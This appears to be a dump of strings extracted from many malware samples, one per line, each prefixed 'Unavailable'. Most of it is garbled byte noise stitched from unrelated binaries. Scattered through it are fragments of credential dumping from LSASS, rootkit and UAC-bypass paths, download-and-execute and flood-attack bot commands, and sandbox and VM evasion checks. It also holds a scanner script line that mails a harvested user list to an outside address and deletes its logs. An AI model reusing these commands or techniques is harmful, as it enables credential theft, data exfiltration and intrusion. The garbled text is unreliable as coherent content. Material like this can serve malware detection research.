Unavailable cu01wb
Unavailable +i0:
Unavailable x`yb+=
Unavailable waitforsingleobjectex
Unavailable hijaak 2`
Unavailable qltyk
Unavailable svw1
Unavailable in l
Unavailable ?fim
Unavailable itsf
Unavailable t\f>
Unavailable {7_.
Unavailable qeow
Unavailable [3g(
Unavailable vfff
Unavailable eephq
Unavailable usage: %s [-h] [-v] [-t target] [-u username] [-p password][assuming one session already existed or target is null.]heapalloc() failed for ansiservererror : fail to enumerate current sessionerror : fail to get session datafail to search lsass datakerberos.dlllivessp.dllwdigest.dlltspkg.dlllsasrv.dlltmp.dat?getmsgproc@@ygjhij@zishkmsjetodb.dll
Unavailable 4azi3
Unavailable $ygukvm
Unavailable portlistfno.533.netexitfckappfree.dllk
Unavailable aphu{].%
Unavailable getreadyfordeadpru\
Unavailable sqrw
Unavailable ,/<-w
Unavailable ~yyj
Unavailable l97u
Unavailable getcpinfo
Unavailable `cg[
Unavailable `_snlf?
Unavailable (p\c
Unavailable vprotect
Unavailable +.\\
Unavailable !%f&r
Unavailable ^z_y[]
Unavailable g1jt9
Unavailable .[h@/
Unavailable 3lfa
Unavailable % ,d
Unavailable |d%nq
Unavailable +3c8
Unavailable innosetupldrwindow
Unavailable 1ef0d55861681d4d208ec3070b720c21d885cb35popthatkitty.resources.resourcesu4tsotmpm)
Unavailable |0w{(
Unavailable f+ul
Unavailable d:\\hkdoor_src\\hkdoor_src\\hkdoor_src\\hkdoor_src_x32\\filterdriver\\release\\drvfltip.pdbsniffitmyworkstart%s\\sadeep.dll%s\\cangur.dathttp:%sport:%d&ver=cobra 1.2&mark=&id=noid&end=1 %d.%d&l_ip=drive=%c:&#1a&2b@doublesafezmunk:vistawin2000win2003win2003r2win2008win2008r2win2012win32swin7win8win95win95osr2win98win98sewinmewinxp%hso
Unavailable zh<p
Unavailable q@u8
Unavailable ckub
Unavailable cp0#
Unavailable %x@@
Unavailable %l0@
Unavailable rta]
Unavailable 6$&n
Unavailable rouninitialize
Unavailable /#sd/
Unavailable vlj "
Unavailable !jj%
Unavailable form.z1form.z2tobinary(tobase64(\"->\"&\"|\")createfile szconfigpath errordecrypt old sname error is running!
Unavailable freeconsoleprocess writeparameterfilesstockmasterinsertemailfax
Unavailable d~h9-
Unavailable )vr"@
Unavailable ]01wb
Unavailable coclass
Unavailable s@'q3\
Unavailable ~gk~
Unavailable ft4d+
Unavailable ym0dz
Unavailable m&"<q
Unavailable ayu/
Unavailable pne];
Unavailable t$(r
Unavailable ac&8
Unavailable getversion
Unavailable rux{
Unavailable i(`}
Unavailable jc4jwl
Unavailable craatepipea
Unavailable d$pm
Unavailable o\rp
Unavailable `anonymous namespace'
Unavailable g*lx4
Unavailable }#yz
Unavailable t4a+
Unavailable 3h`>}0n
Unavailable &vxo
Unavailable )ie+
Unavailable \\stringfileinfo\\%s\\fileversionclsid\\%s\\auxclsidlnkfile\\shellex\\iconhandler%s: %s, %.2hu %s %hu %2.2hu:%2.2hu:%2.2hu gmt%smutex\\shelliconcache+6service pack procdatawrapimagehlp.dlldnlibsh%
Unavailable ldt(-
Unavailable a^_]
Unavailable ot6;vm^]
Unavailable $=5\
Unavailable [xy~
Unavailable www.webtoolmaster.com
Unavailable v!4jc
Unavailable d$ e3
Unavailable rsfx
Unavailable sf):
Unavailable 'uuz#
Unavailable ;sib
Unavailable select a.user from sys.user_users a oci 8 - ocidescriptorfreeoracommand *msvbvm60.dll_cicosckmhv0
Unavailable ffsh
Unavailable '{$bp;
Unavailable 2pen
Unavailable p5ge
Unavailable vh(l
Unavailable u;e3
Unavailable d0: 2:cin
Unavailable %c:\\~tmp%08x.tmp%s%08x.tmp.
Unavailable short
Unavailable `hhwc
Unavailable %(yt
Unavailable m0:{v
Unavailable i6q1
Unavailable ndnoy=
Unavailable :s+d
Unavailable vgiw
Unavailable mpo=
Unavailable f=:i
Unavailable address: 0x
Unavailable extern "c"
Unavailable getstartupinfow
Unavailable lfpa
Unavailable h5kx
Unavailable h3*note: this version of setcallback does not work with peddlecheap versions priorusage: setcallback <input file> <output file>dfreader.exe logfile aeskey [-j] [-o outputfilename]double feature target versiondoublefeature process id
Unavailable :n2qz
Unavailable iio/
Unavailable lame3.99.5uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu
Unavailable qvg"
Unavailable dx5bt
Unavailable 7*yl
Unavailable =sgw
Unavailable h4hc
Unavailable ?@hx
Unavailable r^\ai\op<r
Unavailable )))))))
Unavailable d$ ps
Unavailable )t$
Unavailable fxo(9^
Unavailable (aem
Unavailable n\oq
Unavailable 40w@=/
Unavailable lgsjr
Unavailable suv`
Unavailable %x"8'
Unavailable t2d+
Unavailable yav-
Unavailable yyyyyyyyyyyyyyyy?a73957838_2@@yaxxz?a84884@@yaxxz?b823838_9839@@yaxxz?e747383_94@@yaxxz?e83834@@yaxxz?e929348_827@@yaxxz7
Unavailable "s6;
Unavailable (|$pl
Unavailable .text
Unavailable 0a_a\_
Unavailable a^_^
Unavailable hx\c
Unavailable @2&@
Unavailable hhuc
Unavailable advapi32.dll
Unavailable !$+'
Unavailable gbr[:>5
Unavailable ulwg^r
Unavailable t$f
Unavailable 29yy
Unavailable un{o
Unavailable l$ watauavawh
Unavailable `zv"%
Unavailable /x86/bypassuac.exe/x64/bypassuac.exe/x86/bypassuacdll.dll/x64/bypassuacdll.dllafx_idp_command_failurew
Unavailable q4lc
Unavailable 14rg#h
Unavailable e)#`
Unavailable '[c/
Unavailable authe
Unavailable wl|%
Unavailable hlp@
Unavailable l$@h3
Unavailable ~w]]s
Unavailable pklite copr. 1990-1995 dcu2
Unavailable (sy2
Unavailable *:-x
Unavailable g201wb
Unavailable ywea
Unavailable +h->|
Unavailable getxstatefeaturesmask
Unavailable gx@j
Unavailable 1gn46
Unavailable >r@'t
Unavailable cp*@
Unavailable \oyd
Unavailable de^si
Unavailable content-length: %d
Unavailable lhm+
Unavailable jay\g
Unavailable ibrd
Unavailable sbiedll.dlldbghelp.dllapi_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dllhardware\\description\\systemsystembiosversionqemuhardware\\devicemap\\scsi\\scsi port 0\\scsi bus 0\\target id 0\\logical unit id 0identifiervboxsoftware\\oracle\\virtualbox guest additionsvideobiosversionvirtualboxvmwaresoftware\\vmware, inc.\\vmware toolswine_get_unix_file_namevmxhf
Unavailable b'kg
Unavailable sc;e=4
Unavailable n$"a^
Unavailable g4lc
Unavailable 3}r s
Unavailable w"pn
Unavailable %0@@
Unavailable u\)d
Unavailable .rsrc
Unavailable mu>9
Unavailable %,*8
Unavailable ux<v2
Unavailable ^k/m
Unavailable or%!r-
Unavailable c>v\j
Unavailable getmodulefilenamea
Unavailable vola
Unavailable %x->%x, icmp type %d, code %d\
Unavailable ar;'
Unavailable ^g1'91
Unavailable flushfilebuffers
Unavailable {b*h
Unavailable =:c%
Unavailable '2fo
Unavailable yl/01wb
Unavailable svrg.pdbw32pservicetablein formareleasefastmutexr0omp4arh.text\
Unavailable f9(t
Unavailable `dynamic atexit destructor for '
Unavailable d$>file too large! must be less than 655360 bytes.c:\\ntevt.pdbaraspvuazayax_^]zy[xh
Unavailable rza3
Unavailable september
Unavailable initializeslisthead
Unavailable smwn7n
Unavailable h3select * from win32_process\
Unavailable ppswvppwinscard.dll/
Unavailable s`_3
Unavailable 74lc
Unavailable cb]`n
Unavailable j{.y
Unavailable igfhsk\\ehs\\dihviceh\\serhlsethntrohntcohurrehem\\chsysti
Unavailable uh\?@
Unavailable s"a36
Unavailable <?xml version='1.0' encoding='utf-8' standalone='yes'?>
Unavailable 3,31363h3p3m3u3z3</svg>location.href='httprndbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaakeme132.dllklospad.pdbabcxyz11!dmalock!dmalock3.0!dmalock4.0fso.gettempname();tmp_path = tmp_path.replace('.tmp', '.exe')var shell = new activexobject('wscript.shell');shell.run(t'zoomit - sysinternals: www.sysinternals.comm
Unavailable ex.dll
Unavailable a<url>k__backingfield<runhidden>k__backingfielddownloadandexecute-
Unavailable cmdprocessexitedrootdirgetnativesysteminfo%08x%08x%08x%08xc
Unavailable /[(-(e
Unavailable ["93
Unavailable y9t$
Unavailable p3}-
Unavailable bjr;
Unavailable lhgi
Unavailable (o:8
Unavailable c(2[
Unavailable a&.m
Unavailable ^3|j
Unavailable =s#i
Unavailable 58p1
Unavailable *xx3r
Unavailable toa+
Unavailable (`+qy
Unavailable e:\\1510prj\\
Unavailable t$xd
Unavailable polyene
Unavailable =g\x
Unavailable k/tu
Unavailable %g2f
Unavailable f-3d
Unavailable $n+je
Unavailable 'x_`4
Unavailable <r2v
Unavailable [_^]
Unavailable 0-i~=
Unavailable j/,o
Unavailable -gf6
Unavailable mel'o
Unavailable j<6
Unavailable 1n9e51&
Unavailable gbnu
Unavailable fwpsreferencenetbufferlist0{3ec05b4a-ea88-1378-3389-66706ba27600}master secretmyengineneteventcannot execute (%d)svcnameusers\\wool3n.h4t\\c-cpp\\cwoolgern
Unavailable ixdi
Unavailable zc|="
Unavailable b/^_
Unavailable s`h!g#
Unavailable al=%
Unavailable d$<s
Unavailable 5z3@
Unavailable d$8<d
Unavailable -?'l
Unavailable +jsl
Unavailable - /p
Unavailable i00dc
Unavailable d$(3
Unavailable ;;zga`
Unavailable tnni
Unavailable -rqa
Unavailable gdgsydlyr_%lxmainexecvecp -a %s %sdbus-daemon--noprofile--norcterm=vt100/proc/%u/cmdlineloadso/proc/self/exeproxy-connection: keep-alivehost: %s:%dproxy-authorization: basic %sserver: apacheproxy-authenticategettimeofdaypthread_mutex_initpthread_mutex_destroypthread_mutex_lockgetsockoptsetsockoptopendirreaddirclosedirrename__this_moduleinit_moduleunhide_pidis_hidden_pidclear_hidden_pidlicensesrcversion=depends=vermagic=current_tasksock_releasemodule_layoutinit_uts_nsinit_netinit_taskfilp_open__netlink_kernel_createkfree_skb
Unavailable c;gg\
Unavailable 5-~k
Unavailable si"h
Unavailable %sexpires on : %04d-%02d-%02d %02d:%02d:%02d178.162.197.9\
Unavailable s&uy
Unavailable x<>l
Unavailable *f"0
Unavailable m0e3
Unavailable l$(l
Unavailable ?|^j
Unavailable fclose
Unavailable private:
Unavailable 11y@
Unavailable +r3
Unavailable q+hf
Unavailable p&f;
Unavailable c}6i
Unavailable infoisft
Unavailable dn$\_b
Unavailable ey/k/$
Unavailable `_pagelk
Unavailable ~!p.
Unavailable fb9<@u
Unavailable $(k2
Unavailable rdsw+y
Unavailable ~dxz
Unavailable !ddd
Unavailable 4wy\
Unavailable 9=91
Unavailable ma:
Unavailable c4c (
Unavailable hddc
Unavailable `rr9
Unavailable tmp.
Unavailable j} j
Unavailable s#u9
Unavailable e-9;4
Unavailable `^xgf
Unavailable qjb)g
Unavailable x1.21
Unavailable xfi{
Unavailable l;:9
Unavailable @82u
Unavailable um.<
Unavailable m6c;~y<s;4v&
Unavailable watcom c/c++32 run-
Unavailable l}ds
Unavailable !n$=o
Unavailable @h`3
Unavailable ;;`k
Unavailable urls
Unavailable k=zy
Unavailable l$ 3
Unavailable o<zu
Unavailable w\ue
Unavailable 7 8#
Unavailable "fi-l
Unavailable kuth76gbbg674v88gy
Unavailable neo,welcome to the desert of real.sysin.logsysout.logsystemp.logv1.0v1.0exfile too big!%sosinfo.datdon't find cmd.exe,please check again or upload the program!7db30d27130508os32__%d.iniusrer__%d.iniusr32__%d.ini3
Unavailable sqlite format 3
Unavailable pvf;
Unavailable qamo ~z
Unavailable ag3
Unavailable v:~vf
Unavailable vb5!
Unavailable l$(h
Unavailable `@mf3i
Unavailable &.xt
Unavailable ):-u
Unavailable c%%7
Unavailable @suvwatavawh
Unavailable zq1}yxku
Unavailable x/4b
Unavailable d$x3
Unavailable 8hz/h
Unavailable qo@s
Unavailable msvcp60.dll
Unavailable 600dc
Unavailable %x:%d->%x:%d, flag %s%s%s%s%s, seq %u, ackseq %u, datalen %ufwpkclnt.sysp
Unavailable t$df;
Unavailable \:64
Unavailable 06<+04u
Unavailable r_g)sb
Unavailable xpppyziqd[l-f6-g41gdsxu'@,~p^p_o,!(gu(gz(gnu5-netsend_v1.00_jrt=
Unavailable l$p3
Unavailable 03kiz^h
Unavailable usercontrol-v80.exem
Unavailable 8,z@
Unavailable 8pht
Unavailable p\r:
Unavailable a/f]wx
Unavailable s9:[
Unavailable 4>ck
Unavailable comctl32.dll
Unavailable 0<9v
Unavailable @+&p
Unavailable qxlr
Unavailable .?av_com_er1.22
Unavailable ":x1
Unavailable 3~hfsr
Unavailable $khjt
Unavailable uvo(
Unavailable 5&j6
Unavailable $wdu
Unavailable +uh/
Unavailable __cdecl
Unavailable dvsl
Unavailable &~z6
Unavailable rnf;\$<
Unavailable zce[
Unavailable i!'[
Unavailable apl{
Unavailable this application cannot run with an active debug
Unavailable qu<q
Unavailable p_^]
Unavailable lk+m
Unavailable not deleting...copyservicetoremotemachinedh exchange failedconnecttonamedpipes3
Unavailable l9d$p
Unavailable december
Unavailable mzre`
Unavailable crcp
Unavailable `wvsqru
Unavailable !prt
Unavailable oq1k
Unavailable b.%16
Unavailable @-yh
Unavailable /update?id=%8.8x
Unavailable \&]l
Unavailable "n*h$%k7
Unavailable fd)d
Unavailable xbs$
Unavailable +)t^
Unavailable jl$q\
Unavailable ivu0@
Unavailable ?-hk
Unavailable l$ sh
Unavailable "_)00dc
Unavailable meq|
Unavailable you already loaded this dll ! :(d
Unavailable aqkp9
Unavailable 40$@=/
Unavailable ht*@
Unavailable 9c8~
Unavailable }l4h
Unavailable httpfloodsynfloodudpfloodtcpflooddownandexevisitsocksm
Unavailable %xs4
Unavailable 0iaq
Unavailable p7+o
Unavailable zth.\
Unavailable cu7d
Unavailable zc)@f
Unavailable bi/x
Unavailable d$0f
Unavailable clnt_raw.c - fatal header serialization error.svctcp_.c - cannot getsockname or listentoo many connections (%d), compilation constant fd_setsize was only %dsvc_run: - select failed@(#)bindresvport.ch
Unavailable mvbzo
Unavailable \$@h;
Unavailable processxelementset_timer1watchdog thread %d waiting on mutexexploit ok run command\\epathobj_exp\\release\\epathobj_exp.pdballlocated userspace pathrecord () %pmutex object did not timeout, list not patchedget /ok.asp?id=1__sql__ http/1.1f
Unavailable zvqal
Unavailable l$ph
Unavailable &'q/u
Unavailable })ew
Unavailable f9|$^t&f
Unavailable createwindowexa
Unavailable &y>u
Unavailable setlasterror
Unavailable p@yy
Unavailable wchrome.exesystem\\currentcontrolset\\control\\systeminformationsystem\\currentcontrolset\\enum\\ide
Unavailable tq00dc
Unavailable di}:
Unavailable gfio
Unavailable m@/)
Unavailable f5?g
Unavailable "*x|5^
Unavailable ~x3>
Unavailable p7p.
Unavailable t?)u
Unavailable msvcp5%d.dllactxprxy.getproxydllinfoactxprxy.dllgetclassobjectactxprxy.dllregisterserveractxprxy.dllunregisterserveryyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy191h1a1november ababababababjanuary october september c:\\users\\rmgree5\\m
Unavailable uwq3
Unavailable '[nn7j%g
Unavailable j,$t
Unavailable h/ya
Unavailable %"fbhp
Unavailable loaderdll.dll{5947bacd-63bf-4e73-95d7-0c8a98ab95f2}\
Unavailable ?!^:
Unavailable gdh\ac
Unavailable d$0@
Unavailable h8sc
Unavailable missing argument for `-x'.
Unavailable }pv=
Unavailable _istmpgsv ovmtgs lu xnw ivhfog urov rh aril!%s %s : hi,my name is %s%szulmvxlkbnfgvcspell-incantation-magic-charm-wizardryo
Unavailable u<+z[
Unavailable ep*?@
Unavailable ;)3czf
Unavailable hsro
Unavailable ]&9!-a2
Unavailable o":g
Unavailable p21;
Unavailable fd99t
Unavailable ~`+"
Unavailable \\objfre_w2k_x86\\i386\\guava.pdbm
Unavailable qaw=
Unavailable 0_[]
Unavailable ~egq
Unavailable d$4@
Unavailable ?30]
Unavailable m@u>
Unavailable ytak
Unavailable .[')
Unavailable 0v1d
Unavailable uvodfrysihlnwpejxqzakcbgmt_
Unavailable gq$9v
Unavailable 7:(sw41
Unavailable +5yqqkp
Unavailable =w>6
Unavailable host: 127.0.0.1ajunk.dlla
Unavailable anarchy will
Unavailable xuv
Unavailable d9uov
Unavailable `dynamic initializer for '
Unavailable oq>k
Unavailable #\inr
Unavailable |$8;3
Unavailable hfuvg
Unavailable el$sq
Unavailable i=e?
Unavailable f9<pu
Unavailable c[5u
Unavailable cocreateinstance
Unavailable lh!i
Unavailable fa9,au
Unavailable zepn
Unavailable yjfz
Unavailable nfug
Unavailable r>r~
Unavailable |$`ic
Unavailable b~6w
Unavailable 9,pi
Unavailable r:f;\$l
Unavailable i%;=1#l
Unavailable d$dh
Unavailable !#b0
Unavailable g|sn
Unavailable lo>'1
Unavailable hdrlavih8
Unavailable h9u+
Unavailable ctbv
Unavailable yai#
Unavailable _;\b
Unavailable vrulz
Unavailable 6j)z
Unavailable _msupdate_/
Unavailable d+ala
Unavailable connect %s:%i http/1.0cks=uthj@hadvpackhashtableget_isdisposedtripledestestmemory.frmmain.resources$
Unavailable }i}&
Unavailable h01wb
Unavailable yyql
Unavailable m|e}
Unavailable b+p:\\66.666k6s6d6l6}60!0&0+0<0a0f0w0\\0a0n0z0;#;);.;:;@;e;q;w;\\;h;q;v;2#2-222f2l2w2\\2b2g2x2~29\"9)90979>9e9l9s9z9k9}96-747;7b7i7p7w7^7e7l7s7z74\"4'43494>4j4p4u4a4g4l4x4:#:(:4:::?:k:t:y:e:k:p:|:wd.hya<\"<)<0<7<><e<l<s<z<a<h<=&=,=1=>=d=i=v=_=d=q=w=|=; ;(;0;8;@;h;p;x;`;h;p;{;<\"<)<0<7<><e<l<s<z<a<h<o<v<6#6(616;6@6i6s6x6d6n6s6|6(%r-c;u3%3g3n3u3\\3c3j3q3x37\"767t7[7b7i7p7w7~71 1-1>1c1p1a1f1s18 8&8,8a8m8^8d8i8
Unavailable i0+y
Unavailable ^5x3
Unavailable ht[c
Unavailable ?h+a
Unavailable acos
Unavailable ckc=
Unavailable 3)kl
Unavailable createfilea
Unavailable :^me
Unavailable z <@k
Unavailable \$xh
Unavailable t2^%
Unavailable {_ly
Unavailable q^h4jv
Unavailable u01wb
Unavailable $a;\
Unavailable ha_a]a\_^[
Unavailable r2lttl
Unavailable _r5;
Unavailable out of memory
Unavailable @vws1
Unavailable d$ m
Unavailable `wp4j
Unavailable f:e|
Unavailable =,<\m
Unavailable e_*0
Unavailable r|bh
Unavailable 9xysp
Unavailable f;*jdw
Unavailable exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'password.txtloginprompta
Unavailable vcasm_protect_2005_3_18
Unavailable |$ h
Unavailable resumethread
Unavailable @net stop seclogonm
Unavailable ectlusetendoffileu
Unavailable :0\n
Unavailable t$xh
Unavailable pklite copr. 1990
Unavailable stub.pdbcie7passwordsnjloggertaskmgrkillerabccba%
Unavailable ;00dce
Unavailable $z"!7hm
Unavailable 1cv#
Unavailable $~jg
Unavailable nl)_frr
Unavailable )+bv
Unavailable getprocaddrn5645653234543_nb3\
Unavailable d$p+
Unavailable )wrh
Unavailable q0u^_
Unavailable sspythespyw
Unavailable k4dll.dllthe windowaeba21fa-782a-4a90-978d-b72164c80120a8a88c49-5eb2-4990-a1a2-0876022c854f</msg>
Unavailable r]w]zkcp?r
Unavailable user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1) ( /s ) :forms.vbpforms.vcpsoftware\\flysky\\e\\installname=\"microsoft.windows.common-controls\" e
Unavailable connecting http port - result: no space for command line argument vectormicrosoft(july/1999~) http://www.microsoft.com/technet/security/current.aspno space for copy of command line- windows nt,2000 patch method - scanf : floating point formats not linkedhrdir_b.c: loadlibrary != mmdll borlndmm failed!\"what?\"%s port %d closedprintf : floating point formats not linkedxxtype.cpp-err invalid command, type [help] for command list-err get sms users id failedcontrol time out 90 secs, connection closed-err post sms failedcurrent.hlthistroy.hlt-err send sms failed-err change password <new password>+ok send sms succussifully+ok set new password: [%s]change passwords:\\ammyy\\sources\\target\\trservice.cpps:\\ammyy\\sources\\target\\trdesktopcopyrect.cppglobal\\ammyy.target.incomeports:\\ammyy\\sources\\target\\trfmfilesys.cppplease enter password for accessing remote computercreateprocess1()#3 %d error=%dchttpclient::sendrequest2(%s, %s, %d) error: invalid host name.error: createprocessasuser() error=%d, session=%derror: findprocessbyname('explorer.exe')or: %s -r [host.tty]%s: process: character, ^x, or (octal) \\032 expected.type \"screen [-d] -r [pid.]tty.host\" to resume one of them.%s: at [identifier][%%|*|#] command [args]slurped only %d characters (of %d) into buffer - try againcommand from %s: %s %s[ passwords don't match - your armor crumbles away ][ passwords don't match - checking turned off ]writing packet : error on socket (or connection closed): %sremote connection closed by signal sig%s %sreading private key %s failed (bad passphrase ?)server closed connection%s: line %d: list delimiter not followed by keywordchecking for version `%s' in file %s required by file %sremote host closed connection%s: line %d: bad command `%s'verifying that server is a known host : file %s not found%s: line %d: expected service, found `%s'%s: line %d: list delimiter not followed by domainpublic key from server (%s) doesn't match user preference (%s)# pscan completed in %u seconds. (found %d ips)usage: %s <b-block> <port> [c-block]%s.%d.* (total: %d) (%.1f%% done)invalid ip.# scanning: unable to allocate socket.cat trueusers.txt | mail -s \"eyes\" clubby@slucia.commv scan.log bios.txtrm -rf bios.txtecho -e \"# by eyes.\"././pscan2 $1 22echo \"#cautam...\"echo -e \"${blu}private scanner by raphaello , demmonn , tzepelush & drac\\n\\rkillall -9 pscan2echo \"[*] ${dcyn}gata esti h4x0r ;-)${res} [*]\"echo -e \"${dcyn}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${res}\"snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);printf(\"usage: %s <b-block> <port> [c-block]\\n\", argv[0]);printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - scaconnlist[i].addr.sin_family = af_inet;snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\",wscript.echo \" $$\\ $$\\ $$\\ $$\\ $$$$$$\\ $$$$$$$$\\ $$\\ $$\\ $$$$$$$$\\ $$$$$$plug-in thread causes an exception, failed to alert user.pluggetudpportpluggettcpportpluggetvulnnum\\\\.\\pipe\\pipecmd_communicatonpipecmd servicel
Unavailable 37>k
Unavailable h9\$x
Unavailable uploadposturldownloadtofilereporter.php?msg=&uname=&pword=technically could be run against remote computers, if allowedd
Unavailable 0hi}
Unavailable pmw1
Unavailable `l6a2
Unavailable <0u?
Unavailable *2lz
Unavailable dom4!nuserp4ss273ce6-b29f-90d618c0ace123dxace123dxl!ace123dx!@#x/catelog/login1.asp~dftmp$$$$$.1get /query.asp?loginid=loadconfigfromreg faildedloadconfigfrombuildin success/photoe/photo.asp httppost /photos/photo.asppcc_ident$$$--hellowrod--$$$.?avpcc_basemod@@ps1=rk# \\u@\\h:\\w \\$unset ls_options;uname -a[diskio]/tmp/.secure\x7felf\
Unavailable be~`d
Unavailable gettemppatha
Unavailable @@for /f \"delims=\" %%i in ('findstr /smc:\"%s\" *.msg') do if not \"%%msgfile1%%\"==\"%%i\" del /f \"%%i\"logging out of webadmin (as target account)[+] connected to the registry servicef08d49ac41d1023d9d462d58af51414daff95a6a[+] checkcredentials(): checking to see if valid username/passworderror connecting to target, tbmakesocket() %s:%d.nterrormoreprocessingrequiredcommand format error: error=%xnterrorpasswordrestriction
Unavailable findfirstfileexa
Unavailable rix3
Unavailable a-slf=
Unavailable 9.}h
Unavailable =[9uf
Unavailable /.md/cgi-mac/xnocz1checkvir.plist/users/apple/documents/mac backimuler2/users/imac/desktop/macback/xntaskz.gz2wmsetstatus.cgilaunch-0rp.dat2wmupload.cgixntmpz2wmrecvdata.cgixnorz62wmdelfile.cgi/lanchagents/checkvir0pera:%s/tmp/spotlight/tmp/launch-ics000
Unavailable putstring('%s')
Unavailable x^+_
Unavailable |[r&
Unavailable nt/x-
Unavailable |(e~
Unavailable "w q
Unavailable lcidtolocalename
Unavailable n|_>
Unavailable http://www.realtek.com0{
Unavailable =tw@
Unavailable _ivt+
Unavailable y4ai
Unavailable y@[`
Unavailable j=""n
Unavailable {kfy6
Unavailable e>m-
Unavailable 65^v
Unavailable error!
Unavailable d&o8c
Unavailable $gdd
Unavailable annfl
Unavailable 6aub
Unavailable yf_
Unavailable mo=o
Unavailable 9ra*
Unavailable t2vs
Unavailable j#%lv
Unavailable h e@
Unavailable #>cr
Unavailable 8j9v
Unavailable p210
Unavailable `vbtable'
Unavailable scef
Unavailable %<@@
Unavailable rle
Unavailable t-jt
Unavailable 2#jd
Unavailable kcb~];1
Unavailable z/</
Unavailable 3& }?in;=
Unavailable l$(i
Unavailable plugindeflatercompressionmodesystem.io.compressiont
Unavailable bzfs
Unavailable lfwjm
Unavailable h3qd
Unavailable decodeproductkeystarthttpfloodcodekeymessageboxgetfilezillapasswordsdatainudpzsocketsr
Unavailable \m=8
Unavailable freeenvironmentstringsw
Unavailable b&>zy$
Unavailable shell32.dll
Unavailable [attempt-error] target %s - login \"%s\" - pass \"%s\" - child %d - %lu of %lu(description=(connect_data=(cid=(program=))(command=reload)(password=%s)(servicecn=^user^,cn=users,dc=foo,dc=bar,dc=com for domain foo.bar.commyblog:http://hi.baidu.com/0x24quser_namefromwwhered
Unavailable p`m8
Unavailable t&[]1b
Unavailable l$@h
Unavailable p`>h
Unavailable t$hi
Unavailable \-0q
Unavailable 1<.a
Unavailable -b=18
Unavailable sv^h
Unavailable cointerface
Unavailable h`rc
Unavailable yb'fmvt+
Unavailable xazz
Unavailable ]%dw
Unavailable ac&t
Unavailable cmx1
Unavailable tsa+
Unavailable t$hd
Unavailable oq57
Unavailable ive[
Unavailable :douc
Unavailable hr'n
Unavailable l$0d
Unavailable fd9,yu
Unavailable j1#gv!a
Unavailable 8\2(
Unavailable j],0
Unavailable o\e?
Unavailable ocyu
Unavailable wl2t
Unavailable c'\!
Unavailable w`r+
Unavailable l$03
Unavailable d$(s
Unavailable /"ochskcjsi
Unavailable om;j
Unavailable klyn
Unavailable %97gd]
Unavailable 't!ta
Unavailable xpppyziqd[l-f6-g41gdsxu'@,~p^p_o,!(gu(gz(gnu5<
Unavailable aktxe
Unavailable {0z(
Unavailable brno
Unavailable s9dn
Unavailable t&<"u
Unavailable cek.+
Unavailable d&4ejcx 0
Unavailable f)cd`
Unavailable >uc=
Unavailable f;\$0r
Unavailable %$xa
Unavailable |$@d
Unavailable o ->
Unavailable xwi96tri
Unavailable zv00dc
Unavailable uch*
Unavailable 1/*cn
Unavailable >r0b
Unavailable )]%v-y
Unavailable <6vp
Unavailable n$w7
Unavailable hdllcanloadnowpxxwuzx{upz{czayvqf4{r4gav
Unavailable z:\\slender\\mozart\\mozart\\release\\mozart.pdbgarbage.tmp
Unavailable 4>t@
Unavailable `t++j0e
Unavailable pi1n
Unavailable qhbn-
Unavailable 91su
Unavailable 9gkx
Unavailable vpqr
Unavailable uobd
Unavailable hoxfu
Unavailable \\boot.lnk%userprofile%w
Unavailable a_pmyq
Unavailable )x-&
Unavailable <m00></m13>mozilla/4.0 (compatible; msie 6.0;)\x0022e2hqog\x0022e2humt
Unavailable =a!x
Unavailable _logb
Unavailable k8h;
Unavailable a|2f
Unavailable saturday
Unavailable []1'dcpq
Unavailable 7x^m
Unavailable getstartupinfoa
Unavailable 0n^ko
Unavailable vurqsp
Unavailable \n5645653234543_nb3\
Unavailable p0tu^
Unavailable noobyprotect se 1.j
Unavailable c,5g
Unavailable rhd;
Unavailable _per
Unavailable shpakh
Unavailable q$'a8
Unavailable d$(l9
Unavailable _tmh
Unavailable aplibu
Unavailable servicecmdshell<!-- if your application is designed to work with windows 8.1, uncomment the fols
Unavailable g~|s
Unavailable |{-o;w
Unavailable g(pf
Unavailable 0[,?b
Unavailable 000dc
Unavailable $mku
Unavailable f9)uth
Unavailable winrat-win32-release.exer
Unavailable 848bps
Unavailable a?x[
Unavailable f_,d
Unavailable lw"`#
Unavailable -{ko
Unavailable |0(3
Unavailable l*g8v(
Unavailable pqrp
Unavailable d^dfsz
Unavailable /m[]
Unavailable ;{6w
Unavailable g-yv<
Unavailable 5^$l
Unavailable g@f<
Unavailable rsa2
Unavailable -z\&'
Unavailable 70)l!
Unavailable _u/h
Unavailable t#2m~
Unavailable 601(h
Unavailable d$tf;
Unavailable b:k1?d
Unavailable "7|mk
Unavailable 00dcx
Unavailable v(n{
Unavailable 69d]g
Unavailable o=00dc5
Unavailable o @a
Unavailable 3.q(zzz
Unavailable cba;
Unavailable getversendcamlistuntpluginypmw1syv023qzdwz2plawbmpf3pb7rjecerberuscom/crimson/pkcom/crimson/bootstrapjar/pkcom/crimson/permajarmulti/permajarreporter$1.classpkcom/crimson/universal/containers/keyloggerlog.classpkcom/crimson/universal/uploadtransfer.classpk####@####
Unavailable @2m)r
Unavailable ^j`juunsxk
Unavailable void
Unavailable m'h3
Unavailable /]fl4u
Unavailable --------------
Unavailable <n_[e
Unavailable b3!f
Unavailable ac(i
Unavailable t=h=
Unavailable messageboxa
